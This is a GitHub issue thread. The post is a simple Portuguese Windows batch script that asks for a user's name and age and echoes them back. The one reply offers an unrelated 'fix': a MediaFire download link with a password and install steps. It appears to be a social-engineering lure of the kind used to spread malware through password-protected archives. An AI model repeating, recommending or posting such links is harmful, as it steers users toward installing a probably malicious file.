### ISSUE TITLE
bat cmd

### ISSUE THREAD

**Issue by silvaamorimgithub** [silvaamorimgithub/html#8]
Set /p age=digite sua idade:
Set /p name=digite seu nome:
Echo ola %name%
Echo wow voce tem %age% anos
Pause

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
